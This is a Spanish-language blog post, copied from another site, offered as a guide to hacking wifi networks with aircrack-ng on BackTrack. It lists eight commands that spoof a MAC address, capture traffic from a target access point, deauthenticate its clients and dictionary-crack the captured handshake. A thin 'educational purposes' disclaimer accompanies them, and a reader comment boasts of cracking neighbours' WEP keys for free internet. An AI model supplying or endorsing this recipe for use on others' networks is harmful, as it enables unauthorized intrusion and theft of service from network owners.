ya que muchos amigos y no tan amigos XD. Me han pedido un manual de como hackear redes wifi y viendo que en http://geektheplanet.net lo pusieron no fui peresoso para copiarlo y aqui la solucion para estos desesperados:

BackTrack es una distribución GNU/Linux en formato LiveCD pensada y diseñada para la auditoría de seguridad y relacionada con la seguridad informática en general. Incluye larga lista de herramientas de seguridad listas para usar, entre las que destacan numerosos scanners de puertos y vulnerabilidades, archivos de exploits, sniffers, herramientas de análisis forense y herramientas para la auditoría Wireless.

Los comandos que se ejecutaron en el video fueron los siguientes:

  1. airmon-ng stop wlan0
  2. ifconfig wlan0 down
  3. macchanger –mac 00:11:22:33:44:55 wlan0
  4. airmon-ng start wlan0
  5. airodump-ng wlan0
  6. airodump-ng -c (channel) -w (file name) –bssid (bssid) wlan0
  7. aireplay-ng -0 5 -a (bssid)wlan0
  8. aircrack-ng (filename-01.cap)-w (dictionary location)

La verdad no quiero entrar en temas eticos ni mucho menos , pero como diria el tio de spiderman Un gran poder…supone una gran responsabilidad , esta informacion siempre es por fines educativos y sobre todo para tapar agujeros de seguridad que tengan en su casa, si lo usan para otras cosas ya es cosa suya..

Lo que si tengo que decirles que siempre es bueno saber que stan haciendo e investigar un poco mas , por que luego terminamos sorprendidos de los que nos pasa.

Mas informacion de la distribucion linux : Backtrack 3

2 comentarios en «Usar aircrack»

  1. He visto que los Adaptadores USB funcionan bien con AirCrack y WifiSlax, me permitieron obtener las claves WEP de Redes Inalámbricas Infinitums de los 2Wire de Telmex en minutos aquí en México para internet gratis.

    🙂

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *